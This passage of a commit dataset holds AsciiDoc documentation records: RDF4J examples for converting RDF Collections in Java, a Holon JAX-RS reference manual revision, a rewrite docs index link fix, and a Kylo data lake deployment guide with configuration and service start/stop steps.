a subject\/predicate IRI as a prefixed name string (for example \u201cex:john\u201d), so you don\u2019t have to use a ValueFactory to create an IRI object first.\n - you can add a literal object as a String, an int, or several other supported Java primitive types.\n - the subject() method make it easier to take a resource-centric view when building an RDF Model.\n\n== RDF Collections\n\nTo model closed lists of items, RDF provides a Collection vocabulary . RDF Collections are represented as a list of items using a Lisp-like structure. The list starts with a head resource (typically a blank node), which is connected to the first collection member via the rdf:first relation. The head resource is then connected to the rest of the list via an rdf:rest relation. The last resource in the list is marked using the rdf:nil node.\n\nAs an example, a list containing three values, \u201cA\u201d, \u201cB\u201d, and \u201cC\u201d looks like this as an RDF Collection:\n\n[[img-collection]]\nimage::rdf-collection.svg[title=\"An RDF Collection containing three items\"]\n\nHere, the blank node `_:n1` is the head resource of the list. In this example it is declared an instance of rdf:List, however this is not required for the collection to be considered well-formed. For each collection member, a new node is added (linked to the previous node via the `rdf:rest` property), and the actual member value is linked to to this node via the `rdf:first` property. The last member member of the list is marked by the fact that the value of its `rdf:rest` property is set to `rdf:ni`l.\n\nWorking with this kind of structure directly is rather cumbersome. To make life a little easier, the RDF4J API provide several utilities to convert between Java Collections and RDF Collections.\n\n=== Converting to\/from Java Collections\n\nAs an example, suppose we wish to add the above list of three string literals as a property value for the property `ex:favoriteLetters` of `ex:John` .\n\nThe {javadoc}model\/util\/RDFCollections.html[RDFCollections] utility allows us to do this, as follows:\n\n[source,java]\n----\nString ns = \"http:\/\/example.org\/\";\nValueFactory vf = SimpleValueFactory.getInstance(); \n\/\/ IRI for ex:favoriteLetters \nIRI favoriteLetters = vf.createIRI(ns, \"favoriteLetters\"); \n\/\/ IRI for ex:John \nIRI john = vf.createIRI(ns, \"John\"); \n\/\/ create a list of letters \nList<Literal> letters = Arrays.asList(new Literal[] { vf.createLiteral(\"A\"), vf.createLiteral(\"B\"), vf.createLiteral(\"C\") }); \n\/\/ create a head resource for our list \nResource head = vf.createBNode(); \n\/\/ convert our list and add it to a newly-created Model \nModel aboutJohn = RDFCollections.asRDF(letters, head, new LinkedHashModel()); \n\/\/ set the ex:favoriteLetters property to link to the head of the list\naboutJohn.add(john, favoriteLetters, head);\n----\n\nOf course, we can also convert back:\n\n[source,java]\n----\nModel aboutJohn = ... ; \/\/ our Model about John\n\/\/ get the value of the ex:favoriteLetters property \nResource node = Models.objectResource(aboutJohn.filter(john, favoriteLetters, null)).orElse(null); \n\/\/ Convert its collection back to an ArrayList of values\nif(node != null) { \n\t List<Value> values = RDFCollections.asValues(aboutJohn, node, new ArrayList<Value>()); \n\t \/\/ you may need to cast back to Literal. \n\t Literal a = (Literal)values.get(0); \n}\n----\n\n=== Extracting, copying, or deleting an RDF Collection\n\nTo extract an RDF Collection from the model which contains it, we can do the following:\n\n[source,java]\n----\nModel aboutJohn = ...; \/\/ our model\n\/\/ get the value of the ex:favoriteLetters property \nResource node = Models.objectResource(aboutJohn.filter(john, favoriteLetters, null)).orElse(null); \n\/\/ get the RDF Collection in a separate model\nif (node != null) { \n\t Model rdfList = RDFCollections.getCollection(aboutJohn, node, new LinkedHashModel()); \n}\n----\n\nAs you can see, instead of converting the RDF Collection to a Java List of values, we get back another Model object from this, containing a copy of the RDF statements that together form the RDF Collection. This is useful in cases where your original Model contains more data than just the RDF Collection, and you want to isolate the collection.\n\nOnce you have this copy of your Collection, you can use it to add it somewhere else, or to remove the collection from your Model:\n\n[source,java]\n----\n\/\/ remove the collection from our model about John \naboutJohn.removeAll(rdfList); \n\/\/ finally remove the triple that linked John to the collection \naboutJohn.remove(john, favoriteLetters, node);\n----\n\nActually, deleting can be done more efficiently than this. Rather than first creating a completely new copy of the RDF Collection only to then delete it, we can use a streaming approach instead:\n\n[source,java]\n----\n\/\/ extract the collection from our model in streaming fashion and remove each statement from the model \nRDFCollections.extract(aboutJohn, node, st -> aboutJohn.remove(st)); \n\/\/ remove the statement that linked john to the collection \naboutJohn.remove(john, favoriteLetters, node);\n----\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8bb9d1571984c399d9ad257cf72bf724584c28ad","subject":"5.1.0 documentation updates","message":"5.1.0 documentation updates","repos":"holon-platform\/holon-jaxrs","old_file":"documentation\/src\/docs\/asciidoc\/reference\/holon-jaxrs.adoc","new_file":"documentation\/src\/docs\/asciidoc\/reference\/holon-jaxrs.adoc","new_contents":"= Holon Platform JAX-RS Module - Reference manual\n:description: Holon platform JAX-RS module reference documentation. \\\nIt concerns the platform JAX-RS and REST services support, including authentication and authorization, JWT support, Jersey and Resteasy integration, Swagger OpenAPI support, Spring framework integration and Spring Boot auto-configuration.\n:revnumber: {project-version}\n:apidir: ..\/api\/holon-jax-rs\n:coreapidir: ..\/api\/holon-core\n:linkattrs:\n:sectnums:\n:nofooter:\n:toc: left\n:toclevels: 3\n\nCopyright \u00a9 2016-2018\n\n_Copies of this document may be made for your own use and for distribution to others, provided that you do not charge any fee for such copies and further provided that each copy contains this Copyright Notice, whether distributed in print or electronically._\n\n== Introduction\n\nThe Holon Platform *JAX-RS* module provides support, components and configuration helpers concerning the link:https:\/\/github.com\/jax-rs\/spec\/blob\/master\/spec.pdf[JAX-RS^] - _Java API for RESTful Web Services_.\n\nThe module provides *JAX-RS* implementations and integrations for platform foundation components and structures, such as the link:holon-core.html#RestClient[RestClient] API, server-side authentication and authorization using a link:holon-core.html#Realm[Realm] and a complete link:http:\/\/swagger.io[Swagger^] _OpenAPI_ support for data containers such as link:holon-core.html#PropertyBox[PropertyBox].\n\nRegarding the *JSON* data-interchange format, this module uses the link:holon-json.html[Holon JSON module] to make available the Holon platform JSON extensions and configuration facilities for JAX-RS endpoints and clients, allowing to seamlessy use link:https:\/\/github.com\/FasterXML\/jackson[Jackson^] or link:https:\/\/github.com\/google\/gson[Gson^] as JSON providers and provide support for _temporal_ types (including the `java.time.*` API) and the `PropertyBox` type out-of-the-box. \n\nThe module provides a full support for link:http:\/\/swagger.io[Swagger^] and the *OpenAPI specification* including support for the `PropertyBox` type (to be exposed as a Swagger _Model_ definition) and for Swagger API listing endpoints (both in _JSON_ and _YAML_ formats) auto-configuration. \n\nFurthermore, the module makes available a set of *auto-configuration* features, both for the JAX-RS ecosystem and for the link:https:\/\/spring.io[Spring^] and link:https:\/\/projects.spring.io\/spring-boot[Spring Boot^] world.\n\nA complete support for the most used JAX-RS implementations (link:https:\/\/github.com\/jersey[Jersey^] and link:http:\/\/resteasy.jboss.org[Resteasy^]) is provided, including Resteasy auto-configuration classes for Spring Boot integration.\n\n=== Sources and contributions\n\nThe Holon Platform *JAX-RS* module source code is available from the GitHub repository link:https:\/\/github.com\/holon-platform\/holon-jaxrs[https:\/\/github.com\/holon-platform\/holon-jaxrs^].\n\nSee the repository `README` file for information about:\n\n* The source code structure.\n* How to build the module artifacts from sources.\n* Where to find the code examples.\n* How to contribute to the module development.\n\n== Obtaining the artifacts\n\nThe Holon Platform uses https:\/\/maven.apache.org[Maven^] for projects build and configuration. All the platform artifacts are published in the *Maven Central Repository*, so there is no need to explicitly declare additional repositories in your project `pom` file.\n\nAt the top of each _section_ of this documentation you will find the Maven _coordinates_ (group id, artifact id and version) to obtain the artifact(s) as a dependency for your project.\n\nA *BOM (Bill Of Materials)* `pom` is provided to import the available dependencies for a specific version in your projects. The Maven coordinates for the core BOM are the following:\n\n_Maven coordinates_:\n[source, xml, subs=\"attributes+\"]\n----\n<groupId>com.holon-platform.jaxrs<\/groupId>\n<artifactId>holon-jaxrs-bom<\/artifactId>\n<version>{revnumber}<\/version>\n----\n\nThe BOM can be imported in a Maven project in the following way:\n\n[source, xml, subs=\"verbatim,quotes,attributes+\"]\n----\n<dependencyManagement>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>com.holon-platform.jaxrs<\/groupId>\n\t\t\t<artifactId>holon-jaxrs-bom<\/artifactId>\n\t\t\t<version>{revnumber}<\/version>\n\t\t\t*<type>pom<\/type>*\n\t\t\t*<scope>import<\/scope>*\n\t\t<\/dependency>\n\t<\/dependencies>\n<\/dependencyManagement>\n----\n\n=== Using the Platform BOM\n\nThe Holon Platform provides an *overall Maven BOM (Bill of Materials)* to easily obtain all the available platform artifacts.\n\nSee link:index.html#obtain-the-platform-artifacts[Obtain the platform artifacts] for details.\n\n[[WhatsNew51x]]\n== What's new in version 5.1.x\n\n* Improved support for the `java.time.*` Date and Time API data types when a `PropertyBox` type is serialized and deserialize as *JSON* in JAX-RS endpoints. See <<JSONMediaTypePropertyBox>>.\n\n* The new `JaxrsAuthenticationInspector` API is available in JAX-RS endpoints to inspect current `Authentication` and perform authorization controls using a JAX-RS `SecurityContext`. See <<JaxrsAuthenticationInspector>>.\n\n* Added support for *Spring Security* based authentication, providing features to integrate the `@Authenticate` annotation based authentication behaviour and using the Spring Security context as authentication handler. See <<JaxrsSpringSecurity>>.\n\n* Improved *Spring Boot* auto-configuration support for _Jersey_ and _Resteasy_ JAX-RS implementations. See <<JaxrsSpringBoot>>.\n\n* Improved link:https:\/\/swagger.io[Swagger^] integration and auto-configuration, using Spring Boot application properties for easier configuration. See <<SwaggerSpringBoot,Swagger Spring Boot integration>>.\n\n[[JaxrsPropertyBox]]\n== `PropertyBox` serialization and deserialization support\n\nThe link:holon-core.html#PropertyBox[PropertyBox] type serialization and deserialization support for JAX-RS compliant servers and clients is available using the following _media types_:\n\n* `application\/json` - see <<JSONMediaTypePropertyBox>>\n* `application\/x-www-form-urlencoded` - see <<FormMediaTypePropertyBox>>\n\n[[JSONMediaTypePropertyBox]]\n=== JSON media type\n\nThe *JSON* serialization and deserialization support for the `PropertyBox` type is provided by the link:holon-json[Holon Platform JSON module]. Both https:\/\/github.com\/FasterXML\/jackson[Jackson^] and link:https:\/\/github.com\/google\/gson[Gson^] JSON providers are supported.\n\nTo learn about `PropertyBox` type mapping strategies and configuration options see the link:holon-json#PropertyBox[PropertyBox] section of the Holon Platform JSON module documentation.\n\nTo enable the `PropertyBox` type support for JSON media type, just ensure that a suitable artifact is present in classpath:\n\n* `holon-jackson-jaxrs` to use the *Jackson* library. See link:holon-json#JacksonJAXRS[Jackson JAX-RS integration] for details.\n* `holon-gson-jaxrs` to use the *Gson* library. See link:holon-json#GsonJAXRS[Gson JAX-RS integration] for details.\n\nThe auto-configuration facilities provided by this two artifacts allow to automatically register and setup all the required JAX-RS features, both for link:https:\/\/github.com\/jersey[Jersey^] and for link:http:\/\/resteasy.jboss.org[Resteasy^] JAX-RS implementations.\n\nWith the `PropertyBox` _JSON_ support enabled, you can write JAX-RS endpoints like this:\n\n[source, java]\n----\ninclude::{examplesdir}\/com\/holonplatform\/jaxrs\/examples\/ExamplePropertyBox.java[tag=json,indent=0]\n----\n<1> A `GET` endpoint method which returns a JSON-encoded `PropertyBox` instance\n<2> A `GET` endpoint method which returns a JSON-encoded `PropertyBox` instances `List`\n<3> A `PUT` endpoint method which accepts a JSON-encoded `PropertyBox` as body parameter. The `@PropertySetRef` annotation is used to specify the `PropertySet` to be used to decode the `PropertyBox` from JSON\n\n[[FormMediaTypePropertyBox]]\n=== Form\/URLencoded media type\n\nThe `application\/x-www-form-urlencoded` media type for `PropertyBox` serialization and deserialization is supported by default and auto-configured for _Jersey_ and _Resteasy_ when the `holon-jaxrs-commons` artifact is present in classpath.\n\nYou can explicitly configure the `application\/x-www-form-urlencoded` media type support in a JAX-RS server or client registering the link:{apidir}\/com\/holonplatform\/jaxrs\/media\/FormDataPropertyBoxFeature.html[FormDataPropertyBoxFeature^].\n\nCAUTION: Only *simple data types* (Strings, Numbers, Booleans, Enums and Dates) are supported for `PropertyBox` serialization and deserialization using the `application\/x-www-form-urlencoded` media type, so you cannot use complex property values (such as Java beans) as `PropertyBox` property values. The *JSON* media type is strongly recommended as `PropertyBox` data interchange format in a JAX-RS environment.\n\nWith the _form\/urlencoded_ `PropertyBox` type support enabled, you can write JAX-RS endpoints like this:\n\n[source, java]\n----\ninclude::{examplesdir}\/com\/holonplatform\/jaxrs\/examples\/ExamplePropertyBox.java[tag=form,indent=0]\n----\n<1> A `POST` endpoint method which accepts a JSON-encoded `PropertyBox` as body parameter. The `@PropertySetRef` annotation is used to specify the `PropertySet` to be used to decode the `PropertyBox` from `application\/x-www-form-urlencoded` data\n\n\/\/ Inclusions\n\ninclude::_client.adoc[]\n\ninclude::_server.adoc[]\n\ninclude::_spring.adoc[]\n\ninclude::_swagger.adoc[]\n\n== Loggers\n\nBy default, the Holon platform uses the https:\/\/www.slf4j.org[SLF4J^] API for logging. The use of SLF4J is optional: it is enabled when the presence of SLF4J is detected in the classpath. Otherwise, logging will fall back to JUL (`java.util.logging`).\n\nThe logger names for the *JAX-RS* module are:\n\n* `com.holonplatform.jaxrs` base JAX-RS module logger\n* `com.holonplatform.jaxrs.swagger` for the _Swagger_ integration classes\n\n== System requirements\n\n=== Java\n\nThe Holon Platform JSON module requires https:\/\/www.java.com[Java] *8* or higher.\n\nThe _JAX-RS_ specification version *2.0 or above* is required.\n\nThis module is tested against link:https:\/\/github.com\/jersey[Jersey^] version *2.x* and link:http:\/\/resteasy.jboss.org[Resteasy^] version *3.x*.\n","old_contents":"= Holon Platform JAX-RS Module - Reference manual\n:description: Holon platform JAX-RS module reference documentation. \\\nIt concerns the platform JAX-RS and REST services support, including authentication and authorization, JWT support, Jersey and Resteasy integration, Swagger OpenAPI support, Spring framework integration and Spring Boot auto-configuration.\n:revnumber: {project-version}\n:apidir: ..\/api\/holon-jax-rs\n:coreapidir: ..\/api\/holon-core\n:linkattrs:\n:sectnums:\n:nofooter:\n:toc: left\n:toclevels: 3\n\nCopyright \u00a9 2016-2018\n\n_Copies of this document may be made for your own use and for distribution to others, provided that you do not charge any fee for such copies and further provided that each copy contains this Copyright Notice, whether distributed in print or electronically._\n\n== Introduction\n\nThe Holon Platform *JAX-RS* module provides support, components and configuration helpers concerning the link:https:\/\/github.com\/jax-rs\/spec\/blob\/master\/spec.pdf[JAX-RS^] - _Java API for RESTful Web Services_.\n\nThe module provides *JAX-RS* implementations and integrations for platform foundation components and structures, such as the link:holon-core.html#RestClient[RestClient] API, server-side authentication and authorization using a link:holon-core.html#Realm[Realm] and a complete link:http:\/\/swagger.io[Swagger^] _OpenAPI_ support for data containers such as link:holon-core.html#PropertyBox[PropertyBox].\n\nRegarding the *JSON* data-interchange format, this module uses the link:holon-json.html[Holon JSON module] to make available the Holon platform JSON extensions and configuration facilities for JAX-RS endpoints and clients, allowing to seamlessy use link:https:\/\/github.com\/FasterXML\/jackson[Jackson^] or link:https:\/\/github.com\/google\/gson[Gson^] as JSON providers and provide support for _temporal_ types (including the `java.time.*` API) and the `PropertyBox` type out-of-the-box. \n\nFurthermore, the module makes available a set of *auto-configuration* features, both for the JAX-RS ecosystem and for the link:https:\/\/spring.io[Spring^] and link:https:\/\/projects.spring.io\/spring-boot[Spring Boot^] world.\n\nA complete support for the most used JAX-RS implementations (link:https:\/\/github.com\/jersey[Jersey^] and link:http:\/\/resteasy.jboss.org[Resteasy^]) is provided, including Resteasy auto-configuration classes for Spring Boot integration.\n\n== Obtaining the artifacts\n\nThe Holon Platform uses https:\/\/maven.apache.org[Maven^] for projects build and configuration. All the platform artifacts are published in the *Maven Central Repository*, so there is no need to explicitly declare additional repositories in your project `pom` file.\n\nAt the top of each _section_ of this documentation you will find the Maven _coordinates_ (group id, artifact id and version) to obtain the artifact(s) as a dependency for your project.\n\nA *BOM (Bill Of Materials)* `pom` is provided to import the available dependencies for a specific version in your projects. The Maven coordinates for the core BOM are the following:\n\n_Maven coordinates_:\n[source, xml, subs=\"attributes+\"]\n----\n<groupId>com.holon-platform.jaxrs<\/groupId>\n<artifactId>holon-jaxrs-bom<\/artifactId>\n<version>{revnumber}<\/version>\n----\n\nThe BOM can be imported in a Maven project in the following way:\n\n[source, xml, subs=\"verbatim,quotes,attributes+\"]\n----\n<dependencyManagement>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>com.holon-platform.jaxrs<\/groupId>\n\t\t\t<artifactId>holon-jaxrs-bom<\/artifactId>\n\t\t\t<version>{revnumber}<\/version>\n\t\t\t*<type>pom<\/type>*\n\t\t\t*<scope>import<\/scope>*\n\t\t<\/dependency>\n\t<\/dependencies>\n<\/dependencyManagement>\n----\n\n=== Using the Platform BOM\n\nThe Holon Platform provides an *overall Maven BOM (Bill of Materials)* to easily obtain all the available platform artifacts.\n\nSee link:index.html#obtain-the-platform-artifacts[Obtain the platform artifacts] for details.\n\n[[WhatsNew51x]]\n== What's new in version 5.1.x\n\n* Improved support for the `java.time.*` Date and Time API data types when a `PropertyBox` type is serialized and deserialize as *JSON* in JAX-RS endpoints. See <<JSONMediaTypePropertyBox>>.\n\n* The new `JaxrsAuthenticationInspector` API is available in JAX-RS endpoints to inspect current `Authentication` and perform authorization controls using a JAX-RS `SecurityContext`. See <<JaxrsAuthenticationInspector>>.\n\n* Added support for *Spring Security* based authentication, providing features to integrate the `@Authenticate` annotation based authentication behaviour and using the Spring Security context as authentication handler. See <<JaxrsSpringSecurity>>.\n\n* Improved *Spring Boot* auto-configuration support for _Jersey_ and _Resteasy_ JAX-RS implementations. See <<JaxrsSpringBoot>>.\n\n* Improved link:https:\/\/swagger.io[Swagger^] integration and auto-configuration, using Spring Boot application properties for easier configuration. See <<SwaggerSpringBoot,Swagger Spring Boot integration>>.\n\n[[JaxrsPropertyBox]]\n== `PropertyBox` serialization and deserialization support\n\nThe link:holon-core.html#PropertyBox[PropertyBox] type serialization and deserialization support for JAX-RS compliant servers and clients is available using the following _media types_:\n\n* `application\/json` - see <<JSONMediaTypePropertyBox>>\n* `application\/x-www-form-urlencoded` - see <<FormMediaTypePropertyBox>>\n\n[[JSONMediaTypePropertyBox]]\n=== JSON media type\n\nThe *JSON* serialization and deserialization support for the `PropertyBox` type is provided by the link:holon-json[Holon Platform JSON module]. Both https:\/\/github.com\/FasterXML\/jackson[Jackson^] and link:https:\/\/github.com\/google\/gson[Gson^] JSON providers are supported.\n\nTo learn about `PropertyBox` type mapping strategies and configuration options see the link:holon-json#PropertyBox[PropertyBox] section of the Holon Platform JSON module documentation.\n\nTo enable the `PropertyBox` type support for JSON media type, just ensure that a suitable artifact is present in classpath:\n\n* `holon-jackson-jaxrs` to use the *Jackson* library. See link:holon-json#JacksonJAXRS[Jackson JAX-RS integration] for details.\n* `holon-gson-jaxrs` to use the *Gson* library. See link:holon-json#GsonJAXRS[Gson JAX-RS integration] for details.\n\nThe auto-configuration facilities provided by this two artifacts allow to automatically register and setup all the required JAX-RS features, both for link:https:\/\/github.com\/jersey[Jersey^] and for link:http:\/\/resteasy.jboss.org[Resteasy^] JAX-RS implementations.\n\nWith the `PropertyBox` _JSON_ support enabled, you can write JAX-RS endpoints like this:\n\n[source, java]\n----\ninclude::{examplesdir}\/com\/holonplatform\/jaxrs\/examples\/ExamplePropertyBox.java[tag=json,indent=0]\n----\n<1> A `GET` endpoint method which returns a JSON-encoded `PropertyBox` instance\n<2> A `GET` endpoint method which returns a JSON-encoded `PropertyBox` instances `List`\n<3> A `PUT` endpoint method which accepts a JSON-encoded `PropertyBox` as body parameter. The `@PropertySetRef` annotation is used to specify the `PropertySet` to be used to decode the `PropertyBox` from JSON\n\n[[FormMediaTypePropertyBox]]\n=== Form\/URLencoded media type\n\nThe `application\/x-www-form-urlencoded` media type for `PropertyBox` serialization and deserialization is supported by default and auto-configured for _Jersey_ and _Resteasy_ when the `holon-jaxrs-commons` artifact is present in classpath.\n\nYou can explicitly configure the `application\/x-www-form-urlencoded` media type support in a JAX-RS server or client registering the link:{apidir}\/com\/holonplatform\/jaxrs\/media\/FormDataPropertyBoxFeature.html[FormDataPropertyBoxFeature^].\n\nCAUTION: Only *simple data types* (Strings, Numbers, Booleans, Enums and Dates) are supported for `PropertyBox` serialization and deserialization using the `application\/x-www-form-urlencoded` media type, so you cannot use complex property values (such as Java beans) as `PropertyBox` property values. The *JSON* media type is strongly recommended as `PropertyBox` data interchange format in a JAX-RS environment.\n\nWith the _form\/urlencoded_ `PropertyBox` type support enabled, you can write JAX-RS endpoints like this:\n\n[source, java]\n----\ninclude::{examplesdir}\/com\/holonplatform\/jaxrs\/examples\/ExamplePropertyBox.java[tag=form,indent=0]\n----\n<1> A `POST` endpoint method which accepts a JSON-encoded `PropertyBox` as body parameter. The `@PropertySetRef` annotation is used to specify the `PropertySet` to be used to decode the `PropertyBox` from `application\/x-www-form-urlencoded` data\n\n\/\/ Inclusions\n\ninclude::_client.adoc[]\n\ninclude::_server.adoc[]\n\ninclude::_spring.adoc[]\n\ninclude::_swagger.adoc[]\n\n== Loggers\n\nBy default, the Holon platform uses the https:\/\/www.slf4j.org[SLF4J^] API for logging. The use of SLF4J is optional: it is enabled when the presence of SLF4J is detected in the classpath. Otherwise, logging will fall back to JUL (`java.util.logging`).\n\nThe logger names for the *JAX-RS* module are:\n\n* `com.holonplatform.jaxrs` base JAX-RS module logger\n* `com.holonplatform.jaxrs.swagger` for the _Swagger_ integration classes\n\n== System requirements\n\n=== Java\n\nThe Holon Platform JSON module requires https:\/\/www.java.com[Java] *8* or higher.\n\nThe _JAX-RS_ specification version *2.0 or above* is required.\n\nThis module is tested against link:https:\/\/github.com\/jersey[Jersey^] version *2.x* and link:http:\/\/resteasy.jboss.org[Resteasy^] version *3.x*.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca43c881a45079796d4d7180ee77dd2f3c27d20a","subject":"Update index.asciidoc","message":"Update index.asciidoc","repos":"ocpsoft\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,jsight\/rewrite,jsight\/rewrite,chkal\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,jsight\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/integration\/index.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/integration\/index.asciidoc","new_contents":"link:..\/index.asciidoc[← Docs Index]\n\n== Integrations and Extensions\n\n* link:cdi.asciidoc[CDI Integration] \n* link:spring.asciidoc[Spring Integration] \n","old_contents":"link:..\/[← Docs Index]\n\n== Integrations and Extensions\n\n* link:cdi[CDI Integration] \n* link:spring[Spring Integration] \n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa8eee5165cb52f07a0930c605f2f49f0fa957af","subject":"Re-structure kerberos docs and add steps to deployment doc","message":"Re-structure kerberos docs and add steps to deployment doc\n","repos":"rashidaligee\/kylo,peter-gergely-horvath\/kylo,rashidaligee\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,rashidaligee\/kylo,claudiu-stanciu\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,Teradata\/kylo,rashidaligee\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo","old_file":"docs\/latest\/deployment-guide.adoc","new_file":"docs\/latest\/deployment-guide.adoc","new_contents":"= Data Lake Accelerator Deployment Guide\n\nWARNING: There is an issue with the spark client using the SQL context with Orc tables using HDP 2.4.2. Please see this troubleshooting tip configure the spark client to work around the issue.\n\nhttps:\/\/wiki.thinkbiganalytics.com\/display\/RD\/Spark+SQL+fails+on+empty+ORC+table%2C+HDP+2.4.2\n\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the Data Lake Accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nThe Data Lake Accelerator services should be installed on an edge node. The following should be available prior to the installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.8 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySQL\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|Cloudera Sandobx|http:\/\/www.cloudera.com\/downloads\/quickstart_vms\/5-7.html|5.7\n|===\n\n=== Prerequisites\n\n==== Hortonworks Sandbox\n\nIf installing in a new Hortonworks sandbox make sure to do the following first before running through the installation steps below.\n\nlink:.\/hortonworks-sandbox.adoc[Configure Hortonworks Sandbox]\n\n==== Java Requirements\nData Lake Accelerator requires Java 8 for NiFi, thinkbig-ui, and thinkbig-services. If you already have Java 8 installed as the system level Java you have the option to leverage that.\n\nIn some cases, such as with an HDP install, Java 7 is the system version and you likely will not want to change it to Java 8. In this case you can leverage the mentioned\nscripts below to download and configure Java 8 in the \/opt\/java directory. The scripts will also modify the startup scripts for NiFi, thinkbig-ui and\nthinkbig-services to reference the \/opt\/java JAVA_HOME.\n\nIf you already have Java 8 installed in a different location you will have the option to use that as well.\n\nNOTE: When installing the RPM the applications are defaulted to use the \/opt\/java\/current location. This default saves a step for developers so that they can uninstall and re-install\nthe RPM without having to run any other scripts.\n\n== Installation\nThere are 3 procedures you can follow to deploy the solution. In a test and production environment you will likely want to follow the manual installation guide as it has more\ndetailed instructions on how to install each individual component. For local development and 1 node development boxes you can leverage the setup wizard procedure to quickly bootstrap\nyour environment.\n\n=== Install Procedure 1: Installing all components on one edge node with internet access using the wizard\n\nFollow the steps below to install the data lake accelerator using the installation wizard script. This is convenient for local sandboxes (HDP\/Cloudera)\nand 1 node development boxes. The WGET command is used to download binaries so internet access is required.\n\nClick on the below link to go to the wizard driven deployment instructions\n\nlink:.\/deployment\/wizard-deployment-guide.adoc[Wizard Driven Deployment Guide]\n\n=== Install Procedure 2: Installing each component manually\nClick on the below link to go to the manual deployment instructions\n\nlink:.\/deployment\/manual-deployment-guide.adoc[Manual Deployment Guide]\n\n=== Install Procedure 3: Cloudera EC2 Docker Sandbox\nThis is an option for those who want to deploy PCNG to single node Cloudera sandbox in AWS. This is useful when you need to get a quick Cloudera instance running to test PCNG but don't have\nthe resources to install a Cloudera cluster\n\nlink:.\/deployment\/cloudera-docker-sandbox.adoc[Cloudera EC2 Docker Sandbox Deployment Guide ]\n\n== Configuration\n\n=== Kerberos\n\nIf your installing Kylo on a kerberos cluster there is some additional configuration required.\n\n. Configuring Kerberos For Your Local HDP Sandbox\n\n This guide will help you enabled kerberos for your local development sandbox\n\n link:.\/security\/kerberos\/kerberos-installation-example-hdp-2.4.adoc[HDP 2.4 Sandbox Kerberos Setup Example]\n\n. Configure Kerberos for NiFi\n\n Some additional configuration is required for allowing the NiFi componenets to work with a Kerberos cluster.\n\n link:.\/security\/kerberos\/nifi-configuration-kerberos-cluster.adoc[Configure NiFi for Kerberos]\n\n. Configure Kerberos for Kylo Applications\n\n Additional configuration is required for allowing some features in the Kylo applications to work with a Kerberos cluster\n\n TODO\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services are located under the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Optimizing Performance\n\nYou can adjust the memory setting for each services using the below environment variables\n\n \/opt\/thinkbig\/thinkbig-ui\/bin\/run-thinkbig-ui.sh\n export THINKBIG_UI_OPTS= -Xmx4g\n\n \/opt\/thinkbig\/thinkbig-services\/bin\/run-thinkbig-services.sh\n export THINKBIG_SERVICES_OPTS= -Xmx4g\n \nThe setting above would set the Java maximum heap size to 4 GB.\n\n=== Change the Java Home\nBy default the thinkbig-services and thinkbig-ui application set the JAVA_HOME location to \/opt\/java\/current. This can easily be changed by editing the JAVA_HOME environment variable\nin the following two files\n\n \/opt\/thinkbig\/thinkbig-ui\/bin\/run-thinkbig-ui.sh\n \/opt\/thinkbig\/thinkbig-services\/bin\/run-thinkbig-services.sh\n\nIn addition, if you run the script to modify the NiFI JAVA_HOME variable you will need to edit\n\n \/opt\/nifi\/current\/bin\/nifi.sh\n\n== Starting and Stopping the Services Manually\nIf you follow the instructions for the installations steps above all of the below applications will be set to startup automatically if you restart the server. In the Hortonworks sandbox\nthe services for thinkbig and NiFI are set to start after all of the services managed by Ambari start up.\n\nFor starting and stopping the 3 data lake accelerator services there you can run the following scripts\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. To Start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To Stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Log Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above are configured at:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nThe default log locations for the various applications are located at:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URL's and ports for the services\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: 